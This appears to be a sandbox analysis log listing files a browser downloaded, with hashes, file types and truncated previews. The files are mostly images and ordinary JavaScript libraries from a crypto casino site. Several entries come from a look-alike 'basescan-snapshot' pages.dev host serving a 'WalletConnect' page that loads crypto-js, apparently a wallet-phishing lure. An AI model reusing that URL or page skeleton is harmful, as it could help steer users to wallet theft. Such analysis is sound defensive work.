                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1375
                                                                                                                                                                                                                                              Entropy (8bit):6.05373522278088
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6Lvkkzum8COZNDsLlpGPUc6Qlfv9wwrVgxamAXpybii:+ZYjwvkklfll0xlfvhqxaRXI+i
                                                                                                                                                                                                                                              MD5:9C1C930481D506CEB962EB39DFF2CF7E
                                                                                                                                                                                                                                              SHA1:877EDC46F6DB6A18A91A81DBA1C11FD14A653BF0
                                                                                                                                                                                                                                              SHA-256:254321D20AAF07410B6A8211A2D52805212C884A2B3CCB8680D38E3BE3E16C17
                                                                                                                                                                                                                                              SHA-512:BFD1C9DB594F873C2CC896859A412B710525B2AE0AABF082B0CAF008C5CFC51BF93EAB3D47A39B41767FE1700ADF9643F1E22481D89D650CC846BE5DAC3C021D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/4f7e7099e6.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3...,...(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma...................4mdat........0@CA.2.......1..+T..1<mt]]..d.......5J..}.J../}.uW........Y....Zcm..]~....&[...D..l_...3.bC.k]r&.mz.%....u.<.!...oMj.M.o.....!aE_...Y.L.G.eGZ@......R.........Sj. O.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65426), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):98239
                                                                                                                                                                                                                                              Entropy (8bit):4.826603535592958
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:OEYlulER5ept0S61Ieb36TtXaWsWo5OMkvcBydaiUq:fYlulY1Ieb36TtXaWsWVdaiUq
                                                                                                                                                                                                                                              MD5:0B963AE045CFEAEBF9C9268941BAE839
                                                                                                                                                                                                                                              SHA1:BCFF338C08F4206B80A07187F58AB84162FEC396
                                                                                                                                                                                                                                              SHA-256:65ACDB685C6BE1CBEDE6217B17E9AB630773CAD817E0087601C85E36CE53148C
                                                                                                                                                                                                                                              SHA-512:8DD5AB0F0120CA120D0295D770AF5CAAEF57F50E491707024F711B358F255EE9F6FC9555303067B2207FF3192018FB781D06CFBAC61A7EDCD8DAA5F5B4D14E88
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-c45e23bc.js
                                                                                                                                                                                                                                              Preview:const e="Accepted",t="Activate",a="Affiliate",o="Amazing",i="Amount",r="Apply",n="April",s="Archived",l="August",h="Available",c="BONUS",d="Back",u="Basic",m="Bonus",y="Bronze",p="CONGRATULATIONS",f="Casino",g="Claim",w="Claimed",b="Code",_="Commission",v="Confirm",k="Congrats",T="Copied",C="Copy",A="Currency",R="Daily",S="Dashboard",I="Days",N="December",P="Dedicated",V="Denied",W="Deposit",E="Details",x="Diamond",B="Earn",O="Earned",D="Ends",L="Epic",H="February",U="Fee",F="Friends",Y="Game",G="Go",M="Gold",q="History",z="Hourly",j="Hours",$="January",J="July",Q="June",X="LV",K="Level",Z="Link",ee="Locked",te="Lottery",ae="March",oe="May",ie="Mega",re="Minutes",ne="Monthly",se="Name",le="November",he="October",ce="Online",de="Optional",ue="Overview",me="Pending",ye="Platinum",pe="Play",fe="Prize",ge="Promotion",we="Quests",be="Rain",_e="Raining",ve="Rakeback",ke="Reach",Te="Ready",Ce="Recharge",Ae="Redeem",Re="Referral",Se="Referrals",Ie="Reload",Ne="Retry",Pe="Rewarding",Ve="Roll",W
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (24744)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):282651
                                                                                                                                                                                                                                              Entropy (8bit):5.567218767621061
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:hsSyEgd2ax8eul/Yeip6J/00dlXol0FQbQwM87uYL0pSN0LlspNsEemtJeNPny:OEgUp9Fuelq0kd7ihJsLsEemvehy
                                                                                                                                                                                                                                              MD5:D4EED5817E618369FDC569A40527216B
                                                                                                                                                                                                                                              SHA1:2E16A92B67B181F526978FEDF1A9448E880307DE
                                                                                                                                                                                                                                              SHA-256:409FEC2A6488C5AB36AE537C03163EFA6D17EF590ED8C8E642FD5FE8A6F40855
                                                                                                                                                                                                                                              SHA-512:C695AA5CC97A2FAB1B59C83244E663D70AECDECE6211F0D216C3BDBD57FE632F322A8F98B31451696DB36BC297E23473541369FD83BDBFBECC8AC8B0F8983F86
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"28",. . "macros":[{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":"0","vtp_name":"userId"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":"0","vtp_name":"sales"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":"0","vtp_name":"orderId"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":"USD","vtp_name":"currency"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"functi
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (956)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):957
                                                                                                                                                                                                                                              Entropy (8bit):4.94879489690738
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:wGwfH3Q4SZLTTy8TsA0QmfJELnEMdAJ4PMmubKVaOTzDxzROXJafWBB6JvtJhDkG:wjQfZLy8NnaJSEZPqB9Oykkvh4CL8K
                                                                                                                                                                                                                                              MD5:D8CC3D9DBD1F66B8B3CBAA552DFF20C8
                                                                                                                                                                                                                                              SHA1:7BDC4845C0109485269B9AAEB73D67BC1F9B36BD
                                                                                                                                                                                                                                              SHA-256:1CBEEBA8D783BFF74C89301C4B62EA897324DE98CE7800F3504F6D54BA4247EE
                                                                                                                                                                                                                                              SHA-512:254F087A4BC49FB85EC3D4FA9A23C4FF4E2D220921099AAA8EC3526FBF8BA9B5698B6C4089D31C4DD5F2121F410B7B5C6C201B9B7317A8116B3FA1B338CC9EA9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{$DEVCOMP:a,$PROXY:r,$TRACK:s,DEV:t,ErrorBoundary:n,For:o,Index:c,Match:l,Show:i,Suspense:u,SuspenseList:d,Switch:b,batch:p,cancelCallback:h,catchError:C,children:E,createComponent:S,createComputed:f,createContext:g,createDeferred:x,createEffect:m,createMemo:R,createReaction:w,createRenderEffect:y,createResource:M,createRoot:k,createSelector:q,createSignal:O,createUniqueId:P,enableExternalSource:T,enableHydration:A,enableScheduling:D,equalFn:F,from:I,getListener:$,getOwner:v,indexArray:z,lazy:B,mapArray:L,mergeProps:V,observable:_,on:j,onCleanup:H,onError:K,onMount:U,requestCallback:W,resetErrorBoundaries:X,runWithOwner:Y,sharedConfig:G,splitProps:J,startTransition:N,untrack:Q,useContext:Z,useTransition:ee}=e.dxzurp;export{n as E,o as F,c as I,l as M,i as S,H as a,O as b,R as c,m as d,u as e,d as f,E as g,b as h,J as i,M as j,k,ee as l,V as m,g as n,U as o,Z as p,P as q,f as r,N as s,q as t,Q as u,I as v,v as w,Y as x};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (38683)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):208394
                                                                                                                                                                                                                                              Entropy (8bit):5.382421705439887
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:Idsnnj+lEo8FX2JKiogBZojytGUgBth17wLmNyfGCT248PfVPv7a1lkggJJKCqZ8:xi+FUbZC170xuS248nVH7aY1iIXaaz
                                                                                                                                                                                                                                              MD5:BEB32C0C7C07CF1A28663DDDEE27D41A
                                                                                                                                                                                                                                              SHA1:692943528800E3E7D42D86F46872D9E2A7C84F1E
                                                                                                                                                                                                                                              SHA-256:8A5F393CA11D19DD3CCFEA8FEDEDAAB6F2E57FF7EF80C4A3CAE98F78B59A171A
                                                                                                                                                                                                                                              SHA-512:8F4AD39652A04E99A7187B80419AAB23156966A231B58C5321FA1ED52E979E92B6EB51FA785181C08A8E79B1A62DDD612F823962BCF4269127BC3975B4EF514F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/highcharts/js/v6/highcharts.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:(function(T,K){"object"===typeof module&&module.exports?module.exports=T.document?K(T):K:"function"===typeof define&&define.amd?define(function(){return K(T)}):T.Highcharts=K(T)})("undefined"!==typeof window?window:this,function(T){var K=function(){var a="undefined"===typeof T?window:T,C=a.document,E=a.navigator&&a.navigator.userAgent||"",F=C&&C.createElementNS&&!!C.createElementNS("http://www.w3.org/2000/svg","svg").createSVGRect,m=/(edge|msie|trident)/i.test(E)&&!a.opera,h=-1!==E.indexOf("Firefox"),e=-1!==E.indexOf("Chrome"),t=h&&4>parseInt(E.split("Firefox/")[1],10);return a.Highcharts?a.Highcharts.error(16,!0):{product:"Highcharts",version:"6.1.4",deg2rad:2*Math.PI/360,doc:C,hasBidiBug:t,hasTouch:C&&void 0!==C.documentElement.ontouchstart,isMS:m,isWebKit:-1!==E.indexOf("AppleWebKit"),isFirefox:h,isChrome:e,isSafari:!e&&-1!==E.indexOf("Safari"),isTouchDevice:/(Mobile|Android|Windows Phone)/.test(E),SVG_NS:"http://www.w3.org/2000/svg",chartCount:0,seriesTypes:{},symbolSizes:{},svg:F,
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1412
                                                                                                                                                                                                                                              Entropy (8bit):6.09607222348143
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6LXkzum8COZNDsLlpGPUc6Qlqf937arSA0q9cQRok:+ZYjwXklfll0xlqfpySrquQRok
                                                                                                                                                                                                                                              MD5:F4BD7F2B0C463C5DA80EC511DC4033B2
                                                                                                                                                                                                                                              SHA1:A9FEDBE21A0CAFEE6F29A4E28B407E2672BA186F
                                                                                                                                                                                                                                              SHA-256:A2A48E25510B702A17548AAE05A47919B68A66958CD5763E08D3D8594F49E0A6
                                                                                                                                                                                                                                              SHA-512:FAD7B781A0C6C0E18B07B45132F505E02D22E7C0CD16755052E3FD906BC61128D4CABD43E298F1D1860CEC618EE47F73EEA6663AE245F78F420092D557E5861F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/8a83305a67.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3...Q...(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma...................Ymdat........0@CA.2.......1..S...X.=.SJR......].{.....G..cM....B..(..k.Q...4.....".p.....@....5*Q..h.HkR.u..^(.I.......")6..Q...z.r.(....."aE^..Km..F..Zkl..k.m\}B...n...c,.l...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (737)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):738
                                                                                                                                                                                                                                              Entropy (8bit):5.081000323787001
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:nLvsSEcCEU5oNDFgGR/eFSSEw9h/UprmzKJeYgJPF8e/KvnY6xsy+y:nTstcCEUSFT/dDAJEYQgJXKvY62G
                                                                                                                                                                                                                                              MD5:E9F163447727FB5F8A4926068DD21D08
                                                                                                                                                                                                                                              SHA1:4A4876080A9D6CB5067B45ABF78E2B02DA8E3DF8
                                                                                                                                                                                                                                              SHA-256:B1D67573159A94DE327B731D6A3FC8457FF19F1997A8B543D8C372CBA1D1EFAA
                                                                                                                                                                                                                                              SHA-512:C7B6747EB37A4A138A383B37CA0780F50F0C13634CC97D409C15B392DBE4529185E5BFBEC41A0B15BDF83854BFEB4E122E8997AC3318B206F417AA02B9F7E9A7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/isObject-010a5422.js
                                                                                                                                                                                                                                              Preview:var l=typeof global=="object"&&global&&global.Object===Object&&global;const f=l;var g=typeof self=="object"&&self&&self.Object===Object&&self,s=f||g||Function("return this")();const j=s;var y=j.Symbol;const o=y;var a=Object.prototype,S=a.hasOwnProperty,d=a.toString,e=o?o.toStringTag:void 0;function u(t){var r=S.call(t,e),c=t[e];try{t[e]=void 0;var i=!0}catch(m){}var b=d.call(t);return i&&(r?t[e]=c:delete t[e]),b}var O=Object.prototype,T=O.toString;function p(t){return T.call(t)}var v="[object Null]",$="[object Undefined]",n=o?o.toStringTag:void 0;function h(t){return t==null?t===void 0?$:v:n&&n in Object(t)?u(t):p(t)}function w(t){var r=typeof t;return t!=null&&(r=="object"||r=="function")}export{o as S,h as b,f,w as i,j as r};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8816), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8816
                                                                                                                                                                                                                                              Entropy (8bit):5.271947938315623
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:DtAMjXrfErgZ3ns5fY77HUuLAyEVBXHSfOEKthiSV57pYC:DFjXrfErgZ3nG6ZxVioSV57SC
                                                                                                                                                                                                                                              MD5:E59BED652BCBB275AA7A59FC188FA12F
                                                                                                                                                                                                                                              SHA1:29E202682AB8D88DFA06E41A0E1001E83B5208C2
                                                                                                                                                                                                                                              SHA-256:2FC25C86FCA8A45E9DCF78370BF9A8664420FF36B83E86371B2EA73177EC35ED
                                                                                                                                                                                                                                              SHA-512:2E80EBAC386412C4686FE87A2801932D346F4736DB41D1E076CEB9B902D442A5943300C9291ECA76FC424EA77E5DC9974CF740F60CF9D499A66D7C32BA900FD3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:define("ace/mode/doc_comment_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./text_highlight_rules").TextHighlightRules,s=function(){this.$rules={start:[{token:"comment.doc.tag",regex:"@[\\w\\d_]+"},s.getTagRule(),{defaultToken:"comment.doc",caseInsensitive:!0}]}};r.inherits(s,i),s.getTagRule=function(e){return{token:"comment.doc.tag.storage.type",regex:"\\b(?:TODO|FIXME|XXX|HACK)\\b"}},s.getStartRule=function(e){return{token:"comment.doc",regex:"\\/\\*(?=\\*)",next:e}},s.getEndRule=function(e){return{token:"comment.doc",regex:"\\*\\/",next:e}},t.DocCommentHighlightRules=s}),define("ace/mode/csharp_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/doc_comment_highlight_rules","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./doc_comment_highlight_rules").DocCommentHighlightRules,s=e("./text_highlight_rules").TextHighlightRu
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (14623)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):14890
                                                                                                                                                                                                                                              Entropy (8bit):5.3898830891000635
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:0mkM1IGcl7ANRFW58u/jOou6Jetv08pqQ/e3RDG2fhCt7rsNoWCSGq:09M1IvdANWiu/jJJsvJqQ/eDGtMHCSGq
                                                                                                                                                                                                                                              MD5:7232E584DC6FAEE6ED0E900DE1D3C2C5
                                                                                                                                                                                                                                              SHA1:3519146BF62BD92B5510955B6A76CBE3510BD4A2
                                                                                                                                                                                                                                              SHA-256:53E99590C392A96491D6FA9356C5F4C464C8687A650C79026456A79A09FB0520
                                                                                                                                                                                                                                              SHA-512:77588554FA25F7B56D402F9371003A36D1811F3599D48D1E85388BD0B16C4FD9C20A90F01EC2AE218557178D3331781C3136FFAB2379B297A365A19AA1D505EE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/index-OFWIR-XG.js
                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["assets/index-DIqvK9Em.js","assets/index-DD2Zk4iT.js","assets/index-CrXVjlJA.css","assets/index-C-NOM3iv.js","assets/index-CMxvzQWG.js","assets/index-D4UuokiM.js","assets/index-CSqi4AR7.css"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.import{c as e,A as ne,u as le,a as I,b as B,d as se,i as s,t as c,S as ae,e as y,B as k,f as o,g as Y,h as x,L as ie,j as oe,k as j,o as ce,l as $,m as J,n as ge,s as u,U as ue,p as L,q as de,D as me,r as K,v as fe,w as he,x as D,M as pe,E as be,y as _e,z as ve,C as v,F as E,G as xe,I as $e,H as we,J as ye,K as Ce,R as Se,T as Ie,N as ke,O as Be,P as Le,Q as De,V as w,W as Ee,X as Q,_ as Z,Y as Fe,Z as Te,$ as Ae,a0 as Re,a1 as Ne,a2 as Pe,a3 as Ue}from"./index-DD2Zk4iT.js";import{B as Me,R as Oe}from"./index-C-NOM3iv.js";import{S as b}from"./index-CMxvzQWG.js";var z=o("<div>"),Ve=o('<div class="px-4 sm:rounded-xl sm:bg-layer3 sm:px-3">'),je=o('<div class="relative mx-4 mr-2 h-2 w-2">'),ze=o('<div class="ml-2 hidden gap-2 lg
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1368
                                                                                                                                                                                                                                              Entropy (8bit):6.031323584213716
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6LDkzum8COZNDsLlpGPUc6QlQnRFW29cjUlHrJlUxQbFIMcDs3ye:+ZYjwDklfll0xleRFW29cKLJOObFIMrj
                                                                                                                                                                                                                                              MD5:04CBF827646BE83F2AE242DBBEBD7ACA
                                                                                                                                                                                                                                              SHA1:34D64CFC9BFD2BBCA8EE64C98D67934B34475F63
                                                                                                                                                                                                                                              SHA-256:FD06AA15EE2FE43652B06614D6BA236EB92DD51FBD09A286DCD1A2134979D8FD
                                                                                                                                                                                                                                              SHA-512:328E665AB62D22965E12C45AA094D2C1C61F20ED2E32704A5E82AA42C50377096950B943E2907E9965EF7E322F6E054EF171863739E92D12454EF93905E97C0F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/6cc52a28-40fc-4a5b-8169-66fd31642b72.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3...%...(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma...................-mdat........0@CA.2.......1..+TlQ.v...x.P...!.......S;..T"..H........R.....;._"...R..../.....8...*.a.C.'....rI.C"j....X....($,pBE%..zu...,....{...X.4.e...X...D.j....`..e
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1217)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1218
                                                                                                                                                                                                                                              Entropy (8bit):5.3580757746970455
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:FtN9QGdGGpNpZhJqN7dODRFLbEicAoQ2XjjWSy9xnKUoRcCcBIYwWWMFA:v3QGdGGpNpZhJqNuXytZjAnKRRgUiA
                                                                                                                                                                                                                                              MD5:320400CCDD35FC2B63F1C8801B9E7572
                                                                                                                                                                                                                                              SHA1:E069BF9BEA8DA9257C43D28DE3F5E8564C44DF26
                                                                                                                                                                                                                                              SHA-256:B3FC7C2706E4C693E6AE626BBE46EADAFD3AAAD2E6A4CC0BB4FE4CE37606D92B
                                                                                                                                                                                                                                              SHA-512:533BE540B0A6499EE451DE018B46F94398B895432B2A9BB1905860AAA0156165F3550051107DA481A099B8E7AFB394FC517F2A6CD83ABCB86206616AE5CABC0A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
